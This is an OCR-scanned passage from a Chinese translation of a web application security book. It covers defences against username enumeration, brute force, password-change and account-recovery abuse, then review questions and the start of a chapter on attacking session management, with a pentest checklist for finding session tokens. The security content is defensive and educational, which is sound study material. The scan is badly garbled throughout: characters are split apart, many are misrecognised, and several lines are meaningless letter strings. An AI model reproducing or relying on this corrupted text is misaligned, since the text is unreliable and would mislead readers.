同 浏览 器 的 重复 登录 失败 ， 从 而 达到 上 述 目 的 。 (当然 ， 不 应 使 用 这 
种 机 制 实 行 任何 实际 的 安全 控制 ， 仅 用 于 为 努力 回忆 其 证 书 的 普通 用 
户 提 供 帮 助 。) 

口 如 末 应 用 程序 文 持 目 我 注册 ， 那 么 它 能 够 以 两 种 方式 防止 这 种 
功能 被 用 于 枚 举 现 有 用 户 和 名。 

四” 不 允许 目 我 选择 用 户 名 ， 应 用 程序 可 为 每 个 新 用 户 建 立 
一 个 唯一 (和 无 法 预测 ) 的 用 户 名 ， 防 止 应 用 程序 披露 
表明 一 个 选 定 的 用 户 名 已 经 存在 的 信息 。 

m ”应 用 程序 可 以 使 用 电子 邮件 地 址 作为 用 户 和 名。 如 果 坪 这 
样 ， 应 用 程序 会 在 登录 过 程 的 第 一 个 阶段 要 求 用 户 输入 
他 们 的 电子 邮件 地 址 ， 然 后 告诉 他 们 等 竺 接收 一 封 电子 
邮件 ， 按 照 其 中 的 指示 操作 。 如 采 电 子 邮 件 地 址 已 经 被 
注册 ， 应 用 程序 会 在 电子 邮件 中 通知 用 户 。 如 采 该 地 址 
没有 被 注册 ， 应 用 程序 会 要 求 用 户 访 问 一 个 唯一 的 、 无 
法 猜测 的 URL 继 续 注 册 过 程 。 这 样 可 防止 攻击 者 枚 举 有 
AA a 


6.4.5 ”防止 蛮 力 攻击 


口 必须 对 验证 功能 执行 的 各 种 质询 采取 保护 措施 ， 防 止 攻 击 者 企 
图 使 用 目 动工 具 啊 应 这 些 质询 。 这 包括 登录 机 制 、 修 改 密码 功能 和 恢 
复 遗 起 密码 等 功能 中 的 质询 。 

口 使 用 无 法 预测 的 用 户 名 ， 同 时 阻止 用 户 名 枚 举 ， 给 完全 育 目 的 
蛮 力 攻击 设置 巨大 障碍 ， 并 要 求 攻击 者 在 实施 攻击 前 已 经 通过 有 种 方 
式 发 现 一 个 或 几 个 特殊 的 用 户 名 。 

口 一 些 对 安全 性 要 求 极 高 的 应 用 程序 (如 电子 银行 在 检测 到 少 
数 几 次 (如 3 次 ) 登录 失败 后 应 立即 禁用 该 账户 ， 并 要 求 账户 所 有 者 采 
取 各 种 非常 规 步 又 重新 激活 该 账户 ， 如 给 呼叫 中 心 拨打 电话 并 回答 一 
系列 安全 问题 。 这 种 策略 的 缺点 在 于 ， 它 允许 攻击 者 通过 重复 禁用 合 
法 用 户 的 账户 同 他 们 发 动 拒绝 服务 攻击 ， 因 而 增加 了 提供 账户 恢复 服 
务 的 成 本 。 一 种 更 加 均衡 的 策略 适用 于 非常 注重 安全 的 应 用 程序 ， 即 
在 检测 到 少数 几 次 (如 3 次 ) 登录 失败 后 将 该 账户 冻结 一 段 时 间 (4030 
分 钟 ) 。 这 种 策略 可 有 效 阻止 密码 猜测 攻击 ， 同 时 可 降低 拒绝 服务 攻 
击 风 险 ， 减 轻 呼 叫 中 心 的 工作 负担 。 

e 口 如 有 果 末 用 临时 冻结 账户 的 策略 ， 应 采取 措施 确保 这 种 策略 的 效 


”为 防止 信息 泄露 导致 用 户 名 枚 举 ， 应 用 程序 绝 不 能 透露 
任何 账户 冻结 信息 。 相 反 ， 应 用 程序 应 对 一 系列 即使 是 
使 用 无 效用 户 名 发 起 的 失败 登录 做 出 响应 ， 通 过 一 条 瘦 
规 消息 提出 警告 : 如 采 出 现 多 次 登 孙 失败 ， 账 户 将 被 冻 
结 ， 建 议 用 户 稍 后 再 试 〈 如 前 文 所 述 ) 。 
me 应 用 程序 不 应 回 用 户 透 露 账户 锁定 标准 。 只 要 告诉 合法 
用 户 “ 稍 后 再 试 ? 并 不 会 显著 降低 服务 质量 。 但 告知 攻击 
者 应 用 程序 到 底 能 够 容忍 多 少 次 失败 的 登录 演 试 、 账 户 
冻结 期 有 多 长 ， 束 会 让 他 们 对 任何 登录 壬 试 进行 调整 ， 
不 顾 账 户 锁定 策略 而 继续 猜测 密码 。 
四 如果 一 个 账户 被 诛 结 ， 那 么 应 用 程序 不 用 检查 用 户 证 
书 ， 直 接 束 可 以 拒绝 该 账户 的 登录 尝试 。 因 为 一 些 应 用 
程序 在 冻结 期 继续 完全 处 理 登录 尝试 ， 并 且 在 提交 有 效 
证 书 时 返回 一 条 差异 并 不 明显 (或 者 差异 比较 明显 ) 的 
消息 ， 因 此 尽管 应 用 程序 执行 账户 冻结 策略 ， 攻 击 者 仍 
然 能 够 利用 这 种 行为 实施 彻底 有 效 的 伺 力 攻击 。 
口 账 户 锁定 之 类 的 常规 应 对 措施 对 防御 一 种 极其 有 效 的 蛮 力 攻击 
并 没有 帮助 ， 即 汤 历 大 量 枚 举 出 的 用 户 名 ， 检 查 单独 一 个 脆弱 密码 ， 
如 password。 例 如 ， 如 果 5 次 登录 失败 就 会 触发 账户 冻结 ， 这 意味 着 攻 


击 者 能 够 对 每 个 账户 演 试 使 用 4 个 不 同 的 密码 ， 而 不 会 引起 任何 中 断 。 
如 果 一 个 应 用 程序 使 用 许多 脆弱 密码 ， 使 用 上 壕 攻击 手段 的 攻击 者 就 
能 够 攻破 许多 账户 。 

当然 ， 如 果 验 证 机 制 其 他 区 域 的 设计 安全 可 靠 ， 这 种 攻击 的 效率 
就 会 显著 降 低 。 如 果 攻 击 者 无 法 枚 举 或 有 歼 预 测 出 用 户 名 ， 他 就 需要 
实施 蛮 力 攻击 以 猜测 用 户 名 ， 其 攻击 速度 也 随 之 减 慢 。 如 果 应 用 程序 
执行 了 严格 的 密码 强度 要 求 ， 攻 击 者 更 没有 可 能 选择 某 个 应 用 程序 用 
户 已 经 选择 的 密码 进行 测试 。 

除 以 上 控制 外 ， 应 用 程序 还 可 以 在 每 个 可 能 成 为 蛮 力 攻击 目标 的 
页 面 ( 见 图 6-9) 使 用 CAPTCHA[2] (全 自动 区 分 人 类 和 计算 机 的 图 灵 
测试 ) 质询 ， 专 门 防御 这 种 攻击 。 实 际 上 ， 这 种 措施 可 防止 攻击 者 问 
任何 应 用 程序 页 面 自动 提交 数据 ， 从 而 阻止 其 手动 实施 各 种 密码 猜测 
攻击 。 实 际 上 ， 人 们 已 经 对 CAPTCHA 技 术 进 行 了 大 量 的 研究 。 有 些 
时 候 ， 针 对 这 种 技术 的 自动 攻击 已 经 能 够 取得 相当 的 成 效 。 此 外 ， 一 
些 攻击 者 甚至 发 起 了 破解 CAPTCHA 的 竞赛 ， 利 用 不 知情 的 公众 人 物 
作为 标记 帮助 攻击 者 实施 攻击 。 但 是 ， 即 使 一 类 特殊 的 质询 无 法 完全 
生效 ， 它 仍然 可 使 大 多 数 随意 的 攻击 者 停止 攻击 行动 ， 转 而 寻找 并 不 
使 用 这 种 技术 的 应 用 程序 。 


一 一 一 一 


Type the characters you see in the picture above. 
图 6-9 ”由 在 阻止 自动 攻击 的 CAPTCHA 控 件 


V RR 攻击 者 在 攻击 一 个 使 用 CPATCHA 控 件 阻止 自动 攻击 
的 应 用 程序 时 一 定 会 仔细 检查 图 像 页 面 的 HTMIL 源 代码 。 我 们 曾 通 
到 过 许多 实例 ， 其 中 谜 题 的 答案 以 文字 形式 出 现在 图 像 标签 的 AIT 
属性 或 一 个 隐藏 表单 字段 中 ， 这 使 精明 的 攻击 者 不 必 解 开 谜 题 就 可 


以 解除 应 用 程序 执行 的 保护 。 


6.4.6 ”防止 小 用 人 功能 


口 应 用 程序 应 始终 执行 密码 修改 功能 ， 人 允许 定期 使 用 的 密码 到 期 
终止 (如 有 必要 ) 并 人 允许 用 户 修改 密码 (不 管 他 们 出 于 任何 原因 希望 
修改 密码 ) 。 作 为 一 种 关键 的 安全 机 制 ， 我 们 必须 精心 设计 这 项 功能 
以 防止 滥用 。 

口 只 能 从 已 通过 验证 的 会 话 中 访问 该 功能 。 

口 不 应 以 任何 方式 直接 提供 用 户 名 ， 也 不 能 通过 隐藏 表 单字 段 或 
cookie 提 供用 户 名 。 用 户 企图 修改 他 人 密码 的 行为 属 非 法 行为 。 

口 作 为 一 项 高 级 防 箱 措 施 ， 应 用 程序 应 对 密码 修改 功能 加 以 保 
护 ， 防 止 攻击 者 通过 其 他 安全 缺 隐 ， 如 会 话 支持 漏洞 、 跨 站 点 脚本 ， 
甚至 是 无 人 看 管 的 终端 获得 未 授权 访问 。 为 达到 这 种 目的 ， 应 要 求 用 
户 重新 输入 现 有 密码 。 

口 为 防止 错误 ， 痢 密码 应 输入 两 次 。 应 用 程序 应 首先 比较 “新 密 
码 ” 与 “确认 新 密码 ”字段 ， 看 它们 是 否 匹配 ， 如 采 不 相 匹配 ， 返 回 一 条 
详细 的 错误 消息 。 

口 该 功能 应 阻止 可 能 针对 主要 登录 机 制 的 各 种 攻击 : 应 使 用 一 条 
常规 错误 消 乱 告知 用 户 现 有 证 书 中 出 现 的 任何 错误 ， 如 果 修 改 密码 的 
丑 试 出 现 少 数 几 次 失败 ， 应 临时 冻结 该 功能 。 

口 应 使 用 非常 规 方式 (如 通过 电子 邮件 ) 通知 用 户 其 密码 已 被 修 
改 ， 但 通知 消 恩 中 不 得 包含 用 户 的 旧 证 书 或 新 证 书 。 


6.4.7 防止 混用 账户 恢复 功能 


口 当 用 户 遗 起 密码 时 ， 许 多 安全 性 至 关 重 要 的 应 用 程序 (如 电子 
银行 ) 通过 非常 规 方式 完成 账户 恢复 : 用 户 必须 给 呼叫 中 心 打 电话 并 
回答 一 系列 安全 问题 ， 新 证 书 或 重新 激活 代码 也 以 非常 规 方式 (通过 
传统 的 邮件 ) 送 往 用 户 注册 的 家 峰 住 址 。 绝 大 多 数 应 用 程序 并 不 需要 
这 种 程度 的 安全 保护 ， 只 需 使 用 目 动 恢 复 功 能 即 可 。 

口 精心 设计 的 密码 恢复 机 制 需要 防止 账户 被 未 授权 方 攻破 ， 避 免 
给 合法 用 户 造 成 任何 使 用 中 断 。 

口 绝 对 不 要 使 用 密码 “暗示 ”之 类 的 特性 ， 因 为 攻击 者 可 利用 明显 
的 暗示 辐 账 户 发 动 攻击 。 


口 通 过 电子 邮件 给 用 户 发 送 一 个 唯一 的 、 具 有 时 间 限 制 的 、 无 法 
猜测 的 一 次 性 恢复 URL 是 帮助 用 户 重 新 控制 账户 的 最 佳 目 动 化 解决 方 
案 。 这 封 电 子 邮件 应 送 至 用 户 在 注册 阶段 提供 的 地 址 中 。 用 户 访 问 该 
URL 即 可 设置 新 密码 。 之 后 ， 应 用 程序 会 向 用 户 送 出 男 一 封 电子 邮 
件 ， 说 明 密码 已 被 修改 。 为 防止 攻击 者 通过 不 断 请 求 密码 重新 激活 电 
子 邮件 而 回 用 户 发 动 拒绝 服务 攻击 ， 在 证 书 得 到 修改 前 ， 用 户 原 有 证 
书 应 保持 有 效 。 

口 为 进一步 防止 未 授权 访问 ， 应 用 程序 可 能 会 同 用 户 提 出 一 个 次 
要 质询 ， 用 户 必须 在 使 用 密码 重 设 功能 前 完成 该 质询 。 设 计 质 询 时 应 
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应 用 程序 应 在 注册 阶段 规定 : 质询 应 对 每 一 名 用 户 提出 
同一 个 或 同一 组 问题 。 如 采用 户 提 供 目 己 的 质询 ， 可 能 
其 中 会 有 一 些 非常 易于 受到 攻击 ， 这 也 使 攻击 者 能 够 通 
过 确定 那些 目 行 设 定 质询 的 用 户 枚 举 出 有 效 的 账户 。 
质询 啊 应 必须 具有 足够 的 随机 性 ， 确 保 攻击 者 无 法 轻易 
猜测 出 来 。 例 如 ， 询 问 用 户 束 读 的 小 学 名 称 束 优 于 询问 
他 们 最 喜欢 的 颜色 。 

为 防止 侯 力 攻击 ， 如 末 多 次 笑 试 完成 质询 都 以 失败 告 
终 ， 应 临时 冻结 相关 账户 。 

如 采 质 询 没有 得 到 正确 啊 应 ， 应 用 程序 不 应 泄露 任何 相 
天 信息 ， 如 用 户 名 的 有 效 性 、 账 户 冻 结 等 。 

成 功 完成 质询 后 ， 应 继续 完成 上 文摘 述 的 处 理 过 程 ， 即 
回 用 户 注册 的 电子 邮件 地 址 发 送 一 封包 含 重 狐 激 活 URL 
的 电子 邮件 。 无 论 在 什么 情况 下 ， 应 用 程序 都 不 得 透露 
用 户 遗 起 的 密码 或 简 单 将 用 户 放 入 一 个 通过 验证 的 会 话 
中 。 此 外 ， 最 好 不 要 直接 进入 密码 重 设 功 能 ， 因 为 与 初 
台 密 码 相 比 ， 攻 击 者 通常 更 容易 猜测 出 账户 恢复 质询 的 
啊 应 ， 因 此 应 用 程序 不 应 依赖 它 对 用 户 进行 验 证 。 


6.4.8 日志、 监控 与 通知 


口 应 用 程序 应 在 日 志 中 记录 所 有 与 验证 有 关 的 事件 ， 包 括 登 录 、 
退出 、 密 码 修 改 、 密 码 重 设 、 账 户 冻 结 与 账户 恢复 。 应 在 适当 的 地 方 
记录 所 有 失败 与 成 功 的 登录 党 试 。 日 志 中 应 包含 一 切 相 关 细 节 (如 用 
户 名 和 IP 地 址 ) ， 但 不 得 泄露 任何 安全 机 密 (如 密码 ) 。 应 用 程序 应 
为 日 志 提 供 强 有 力 的 保护 以 防止 未 授权 访问 ， 因 为 它们 是 信息 泄露 的 
ERMA © 

OYA Er A SEERA AA EIT Be DT SE IE P E a R 
(Race TT hE o PG, VATA BE DZ TR] Dy AET E BE BR AT BB) BO 
式 ， 便 于 他 们 采取 适当 的 防御 与 攻击 措施 。 

口 应 以 非常 规 方式 向 用 户 通 报 任何 重大 的 安全 事件 。 例 如 ， 用 户 
修改 密码 后 ， 应 用 程序 应 同 他 注册 的 电子 邮件 地 址 发 送 一 封 邮件 。 

口 应 以 非常 规 方式 同 用 户 通报 经 常 发 生 的 安全 事件 。 例 如 ， 用 户 
成 功 登 录 后 ， 应 用 程序 应 同 用 户 通 报 上 次 登录 的 时 间 与 来 源 IP/ 域 ， 以 
及 从 那 以 后 进行 的 无 效 登录 笑 试 的 次 数 。 如 有 果 用 户 获 悉 其 账户 正 遭 受 
密码 猜测 攻击 ， 他 就 更 有 可 能 会 经 常 修改 密码 ， 并 设置 一 个 安全 性 噩 
的 密码 。 


6.5 ”人 小结 


验证 功能 可 能 是 应 用 程序 受 攻击 面 中 的 首要 目标 。 并 无 特权 的 匿 
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到 保护 的 功能 和 敏感 数据 。 验 证 功能 是 应 用 程序 安全 防御 机 制 的 核 
心 ， 也 是 防御 未 授权 访问 的 前 沿 阵地 。 

现实 中 的 验证 机 制 存在 着 大 量 的 设计 与 执行 缺陷。 使 用 系统 化 的 
方法 笑 试 各 种 攻击 途径 ， 即 可 对 这 些 缺 陷 发 起 全 面 有 效 的 攻击 。 许 多 
时 候 ， 攻 击 目标 显而易见 ， 如 保密 性 不 强 的 密码 、 发 现 用 户 名 的 方法 
和 一 力 攻击 漏洞 。 为 一 方面 ， 有 些 缺 陷 隐 藏 得 很 深 ,需要 对 复 灯 的 登 
录 过 程 进 行 仔细 的 分 析 才 能 发 现 可 供 利 用 以 “ 敲 开 应 用 程序 大 门 ” 的 细 
微 逻辑 缺陷 。 

“四 处 查 探 "是 攻击 狂 证 功能 最 章 用 的 方法 。 除 主 登录 表单 外 ， 可 
能 还 包括 注册 新 账户 、 修 改 赛 码 、 记 住 密码 、 恢 复 遗 乐 的 密码 与 伪装 
其 他 用 户 等 功能 。 以 上 每 一 种 功能 都 可 能 成 为 潜在 缺陷 的 主要 来 源 ， 
在 一 项 功能 中 特意 避免 的 问题 往往 又 会 在 其 他 功能 中 重新 出 现 。 伦 费 
一 些 时 间 仔 细 检 查 所 能 发 现 的 每 一 个 受 攻击 面 ， 应 用 程序 验证 机 制 的 
安全 性 将 会 得 到 显著 增强 。 


6.6 [A 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 
(1) 在 测试 一 个 使 用 joe 和 pass 证 书 登 录 的 Web 应 用 程序 的 过 程 
Se ee ee eee 
请 求 : 
http://www. wahh-app.com/app? 
action=login&uname=joe&password=pass 
如 有 宋 不 再 进行 其 他 探测 ， 可 以 确定 哪 3 种 漏洞 ? 
(2) 自我 注册 功能 如 何 会 引入 用 户 名 枚 举 漏洞 ? 如何 防止 这 些 漏 


(3) 一 个 登录 机 制 由 以 下 步 又 组 成 : 
(a) 应 用 程序 要 求 用 户 提交 用 户 名 和 密码 ; 
b) 应 用 程序 要 求 用 户 提交 值得 纪念 的 词 中 的 两 个 随机 选择 
字母 。 
应 用 程序 为 何 要 求 用 户 分 两 个 阶段 提供 所 需 的 信息 ? 如 果 不 这 样 
做 ， 登 录 机 制 将 存在 什么 缺陷 ? 
(4) 一 个 多 阶段 登录 机 制 要 求 用 户 首先 提交 用 户 名 ， 然 后 在 后 续 
a oa 息 。 如 果 用 户 提 交 任 何 无 效 的 数据 ， 立 即 返 回 到 第 
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这 种 机 制 存 在 什么 缺点 ? 如 何 修复 这 种 漏洞 ? 
(5) 应 用 程序 在 登录 功能 中 整合 了 反 钓 鱼 机 制 。 注 册 过 程 中 ， 
名 用 户 从 应 用 程序 提供 的 大 量 图 片 中 选择 一 幅 特殊 的 图 片 。 登 录 机 制 
由 以 下 步骤 组 成 : 
(a) 用 户 输入 其 用 户 名 和 出 生日 期 ; 
b) 如 果 这 些 信息 无 误 ， 应 用 程序 向 用 户 显示 他 们 选择 的 图 
片 ， 如 果 信 息 有 误 ， 随 机 显示 一 幅 图 片 ; 
ae (c) 用 户 核实 应 用 程序 显示 的 图 片 ， 如 果 图 片 正 确 ， 输 入 他 
门 的 密码 。 
反 钓 鱼 机 制 的 作用 在 于 : 它 向 用 户 确 认 ， 他 们 使 用 的 是 真实 而 
非 “ 克 隆 ” 的 应 用 程序 ， 因 为 只 有 真正 的 应 用 程序 才能 显示 正确 的 图 


片 。 
肥 钓 鱼 机 制 给 登录 功能 造成 什么 漏洞 ? 这 种 机 制 能 够 有 效 阻 止 钓 
鱼 攻击 吗 ? 


洞 ? 


[1] CAPTCHA H Æ Completely Automated Public Turing Test to Tell 
Computers and Humans Apart (全 自动 区 分 计算 机 和 人 类 的 图 灵 测 试 ) 
的 稍 称 ， 已 由 卡 内 基 梅 隆 大 学 注册 商标 。CAPTCHA 是 区 分 计算 机 和 
人 类 的 一 种 程序 算法 ， 这 种 程序 必须 能 生成 并 评价 人 类 能 很 容易 通过 
但 计算 机 却 通 不 过 的 测试 。 这 个 要 求 本 喘 就 是 悖 论 ， 因 为 这 意味 着 一 
个 CAPTCHA 必 须 能 生成 一 个 它 上 自己 不 能 通过 的 测试 。 一 一 译 者 注 

[2] 社会 工程 (Social Engineering) 是 一 种 利用 人 的 弱点 (如 人 的 本 能 
反应 、 好 奇 心 、 信 任 、 贪 焚 等 进行 诸如 欺骗 、 伤 害 等 危害 手段 ) ， 获 
取 目 吴 利 益 的 攻击 方法 。 一 一 译 者 注 


第 7 章 
攻击 会 话 管理 


在 绝 大 多 数 Web 应 用 程序 中 ， 会 话 管理 机 制 是 一 个 基本 的 安全 组 
件 。 它 帮助 应 用 程序 从 大 量 不 同 的 请 求 中 确认 特定 的 用 户 ， 并 处 理 它 
收集 的 关于 用 户 与 应 用 程序 交互 状态 的 数据 。 会 话 管理 在 应 用 程序 执 
行 登录 功能 时 显得 特别 重要 ， 因 为 它 可 在 用 户 通过 请 求 提交 他 们 的 证 
书后 ， 持 续 向 应 用 程序 保证 任何 特定 用 户 身份 的 真实 性 。 

由 于 会 话 管理 机 制 所 发 挥 的 关键 作用 ， 它 们 成 为 针对 应 用 程序 的 
恶意 攻击 的 主要 目标 。 如 果 攻 击 者 能 够 破坏 应 用 程序 的 会 话 管理 ， 他 
就 能 轻易 避 开 其 实施 的 验证 机 制 ， 不 需要 用 户 证 书 即 可 伪装 成 其 他 应 
用 程序 用 户 。 如 果 攻击 者 以 这 种 方式 攻破 一 个 管理 用 户 ， 那 么 他 就 能 
够 控制 整个 应 用 程序 。 

和 验证 机 制 一 样 ， 通 常会 话 管理 功能 中 也 存在 着 大 量 缺 陷 。 在 最 
容易 遭受 攻击 的 情况 下 ， 攻 击 者 只 需 递增 应 用 程序 向 他 们 发 布 的 令 牌 
值 ， 就 可 以 转换 到 另 一 名 用 户 的 账户 。 在 这 种 情况 下 ， 任 何人 都 可 以 
访问 应 用 程序 的 全 部 功能 。 另 一 方面 ， 如 果 应 用 程序 受到 严密 保护 ， 
攻击 者 必须 付出 巨大 的 努力 ， 破 解 几 层 模糊 处 理 并 实施 复杂 的 自动 攻 
击 ， 才 能 发 现 应 用 程序 中 存在 的 细小 漏洞 。 

本 章 将 分 析 我 们 在 现实 世界 的 Web 应 用 程序 中 发 现 的 各 种 漏洞 ， 
详细 说 明 发 现 和 利用 这 些 漏洞 所 需 执行 的 实际 步 又。 最 后 还 将 描述 应 
用 程序 为 防止 这 些 攻 击 所 应 采取 的 防御 措施 。 


号 错误 观点 “我 们 使 用 智能 卡 进 行 验 证 ， 没 有 智能 卡 攻 击 者 


不 可 能 攻破 用 户 会 话 。” 

无 论 应 用 程序 的 验证 机 制 多 么 安全 稳定 ， 只 有 通过 会 话 用 
尸 随后 提出 的 请 求 才能 与 验证 机 制 建立 联系 。 如 果 应 用 程序 的 
会 话 管 理 存 在 缺陷， 攻击 者 仍然 能 够 避 开 可 靠 的 验证 机 制 ， 危 
及 用 户 的 安全 。 


71 TRAD 


AU 


从 本 质 上 讲 ，HTTP 协 议 没有 状态 。 它 基于 一 种 简单 的 请 求 一 啊 应 
模型 ， 其 中 每 对 消息 代表 一 个 独立 的 事务 。 协 议 本 身 并 无 将 某 位 用 户 
提出 的 各 种 请 求 联系 起 来 的 机 制 ， 并 将 它们 与 Web 服 务 右 收 到 的 所 有 
其 他 请 求 区 分 开 来 。 在 Web 发 展 的 早期 阶段 ， 并 没有 必要 建立 这 种 机 
制 ， 因 为 Web 站 点 公布 的 是 任何 人 都 可 以 查阅 的 静态 HTML 页 面 。 但 
如 今 ; BRAE TEREM 

绝 大 多 数 的 Web* 站 点 ”实际 为 Web 应 用 程序 。 它 们 允许 用 户 注册 与 
登录 ; 帮助 用 户 购 买 及 销售 产品 。 它们 能 够 在 用 户 下 次 访问 时 记 住 他 
的 喜好 。 它 们 可 根据 用 户 的 单 击 和 输入 ， 通 过 动态 建立 的 内 容 提供 丰 
E> 多 媒体 形式 的 使 用 体验 。 为 执行 这 些 功 能 ， 应 用 程序 束 需 要 使 用 


S| 

支持 登录 是 会 话 在 应 用 程序 中 最 主要 的 用 途 。 输入 用 户 名 和 密码 
后 ， 可 以 用 输入 的 证 书 所 属 的 用 户 吴 份 使 用 应 用 程序 ， 直 到 退出 会 话 
或 由 于 会 话 处 于 非 活动 状态 而 终止 。 用 户 不 硕 望 在 每 个 应 用 程序 页 面 
重复 输入 密码 。 因 此 ， 一 旦 用 户 通过 验证 ， 应 用 程序 就 会 为 他 建立 一 
个 会 话 ， 把 所 有 属于 这 个 会 话 的 请 求 当 做 该 用 户 提出 的 请 求 处 理 。 

不 具备 登录 功能 的 应 用 程序 通常 也 需要 使 用 会 话 。 许 多 出 售 商 品 
的 站 点 并 不 要 求 顾 客 建立 账户 。 但 是 ， 它 们 允许 用 户 浏 览 目录 、 往 购 
物 篮 中 添加 商品 、 提 供 交 货 元 信息 并 进行 支付 。 。 在 这 种 情形 下 ， 就 没有 
必要 验证 用 户 的 号 份 : 应 用 程序 并 不 知道 或 关心 绝 大 多 数 用 户 的 号 
份 。 但 是 ， 为 了 与 他 们 进行 交易 ， 应 用 程序 需要 知道 它 收 到 的 哪些 请 
求 来 自 同一 名 用 户 。 

执行 会 话 最 简单 、 最 常见 的 方法 就 是 问 每 名 用 户 发 布 一 个 唯一 四 
会 话 令 牌 或 标识 符 。 用 户 在 随后 回应 用 程序 提出 的 每 一 个 请 求 中 提交 
et EE alge ai en teeter 
E o 

在 大 多 数 情况 下 ， 应 用 程序 使 用 HTTP cookie 作 为 在 服务 器 与 客户 
端 间 传 送 这 些 会 话 令 牌 的 传输 机 制 。 服 务 器 对 新 客户 端的 第 一 个 啊 应 
中 包含 以 下 HTTP 消 息 头 : 


Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55 


客户 端 随后 提出 的 请 求 中 包含 如 下 消息 头 : 


Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55 


这 种 标准 的 会 话 管 理 机 制 非常 容易 受到 各 种 类 型 的 攻击 。 当 攻击 
会 话机 制 时 ， 攻 击 者 的 主要 目标 是 以 某 种 方式 壳 持 一 名 合法 用 户 的 会 
话 ， 由 此 伪装 成 这 名 用 户 。 如 果 该 用 户 已 经 通过 应 用 程序 的 验证 ， 攻 
击 者 就 可 以 访问 属于 这 名 用 户 的 私有 数据 ， 或 者 以 他 的 身份 执行 未 授 
权 操 作 。 如 果 该 用 户 未 能 通过 验证 ， 攻 击 者 仍然 能 够 查看 用 户 在 会 话 
过 程 中 提交 的 敏感 信息 。 

和 前 面 示例 中 运行 ASP.NET 的 Microsoft IIS 服 务 器 一 样 ， 许 多 两 业 
Web 服 务 絮 和 Web 应 用 程序 平台 执行 它们 自己 的 基于 HTTP cookie 的 非 
定制 会 话 管 理解 决 方案 。Web 应 用 程序 开发 者 可 使 用 它们 提供 的 API 将 
会 话 依赖 功能 与 这 种 解决 方案 整合 起 来 。 

事实 证 明 ， 一 些 非 定制 会 话 管理 解决 方案 易于 受到 各 种 攻击 ， 导 
致 用 户 的 会 话 被 攻破 〈 这 一 问题 将 在 本 章 后 面 讨 论 ) 。 上 此外， 一些 开 
发 者 发 现 ， 他 们 需要 比 内 置 解决 方案 所 提供 的 控制 更 加 全 面 的 会 话 行 
为 控制 ， 或 者 希望 避免 基于 cookie 的 解决 方案 中 存在 的 一 些 固有 漏 
洞 。 鉴 于 这 些 原因 ， 安 全 性 至 关 重 要 的 应 用 程序 (如 电子 银行 ) 通常 
使 用 定制 或 并 非 基于 cookie 的 会 话 管理 机 制 。 

会 话 管理 机 制 中 存在 的 漏洞 主要 分 为 两 类 : 

口 会 话 令 牌 生成 过 程 中 的 薄弱 环 忆 ; 

口 在 整个 生命 周期 过 程 中 处 理会 话 令 牌 的 薄弱 环节 。 

我 们 将 分 别 分 析 这 些 弱 点 ， 描 述 在 现实 世界 的 会 话 管理 机 制 中 常 
见 的 各 种 漏洞 ， 以 及 发 现 和 利用 这 些 漏洞 的 实用 技巧 。 最 后 将 描述 应 
用 程序 为 防止 这 些 攻击 所 应 采取 的 防御 措施 。 


渗透 测试 步骤 


许多 应 用 程序 使 用 标准 的 cookie 机 制 传输 会 话 令 牌 ， 这 样 可 直 
接 确 定 哪些 数据 包含 令 牌 。 然 而 ， 在 其 他 情况 下 ， 可 能 需要 进行 一 
PRM A EERE SHE o 
(1) 应 用 程序 常常 使 用 几 个 不 同 的 数据 共同 表示 一 个 令 牌 ， 
包括 cookie、URL 人 参数 和 隐藏 表单 字段 。 其 中 一 些 数据 可 用 于 在 不 
同 的 后 端 组 件 中 维护 会 话 状 态 。 如 采 没 有 得 到 确认 ， 不 要 想当然 地 
认为 某 个 特殊 的 参数 吏 是 会 话 令 牌 ， 或 者 只 使 用 一 个 数据 追踪 会 


话 。 

(2) 有时， 一 些 数据 似乎 是 应 用 程序 的 会 话 令 牌 ， 其 实 并 非 
如 些 。 具 体 来 说 ， 由 Web 服 务 器 或 应 用 程序 平台 生成 的 标准 会 话 
cookie 可 能 存在 ， 但 实际 并 不 被 应 用 程序 使 用 。 

(3) 用 户 通 过 验证 后 ， 观 察 浏览 器 收 到 哪些 新 数据 项 。 应 用 
程序 通常 会 在 用 户 通 过 验证 后 建立 新 的 会 话 令 牌 。 

(4) 为 确定 应 用 程序 到 底 使 用 哪些 数据 项 作为 令 有 牌 ， 找 到 一 
个 确信 依赖 会 话 的 页 面 〈 如 某 一 名 用 户 的 “用 户 资料 "页面 ) ， 并 问 
它 提 出 几 个 请 求 ， 系 统 性 地 删除 疑似 被 用 作 令 牌 的 数据 。 如 果 删 除 
某 个 数据 后 ， 应 用 程序 不 再 返回 会 话 依赖 页 面 ， 即 可 确定 该 数据 可 
能 为 会 话 令 脾 。Burp Repeater 是 执行 这 类 测试 的 有 效 工 具 。 


会 话 替 代 方 案 


并 非 每 一 种 Web 应 用 程序 都 使 用 会 话 ， 一 些 具 备 验证 机 制 、 功 能 
复杂 的 安全 性 至 关 重要 的 应 用 程序 选择 使 用 其 他 技术 管理 状态 。 常 见 
的 会 话 替代 方案 有 两 种 。 

DHTTP 验 证 。 使 用 各 种 基于 HTTP 验 证 技术 (基本 、 摘 要 、 
NTLM 验 证 等 ) 的 应 用 程序 有 时 避免 使 用 会 话 。 在 HITP 验 证 中 ， 客 户 
端 组 件 使 用 HTTP 消 息 头 通过 浏览 器 直接 与 验证 机 制 交 互 ， 而 不 是 通过 
包含 在 任何 单独 页 面 中 的 针对 特定 应 用 程序 的 代码 与 验证 机 制 交 互 。 
一 旦 用 户 在 浏览 器 对 话 框 中 输入 他 的 证 书 ， 浏 览 器 将 会 在 随后 向 同一 
服务 器 提出 的 每 个 请 求 中 重复 提交 这 些 证 书 (或 重复 执行 任何 必要 的 
握手 ) 。 这 种 做 法 等 同 于 应 用 程序 使 用 基于 HTML 表 单 的 验证 ， 并 在 
每 个 应 用 程序 页 面 插入 一 个 登录 表单 ， 要 求 用 户 通 过 他 们 执行 的 每 一 
项 操作 重复 验证 自己 的 身份 。 因此， 如 果 使 用 基于 HTTP 的 验证 ， 应 用 
程序 可 以 不 必 使 用 会 话 ， 而 通过 多 个 请 求 重 复 确 定 用 户 身 份 。 然 而 ， 
基于 因特网 的 应 用 程序 很 少 使 用 HTTP 验 证 。 而 且 ， 由 于 会 话机 制 发 展 
完善 ， 能 够 提供 其 他 用 途 非常 广泛 的 功能 ， 实 际 上 上， 几乎 所 有 的 Web 
应 用 程序 都 采用 这 种 机 制 。 

口 无 会 话 状 态 机 制 。 一 些 应 用 程序 并 不 发 布 会 话 令 牌 管理 用 户 与 
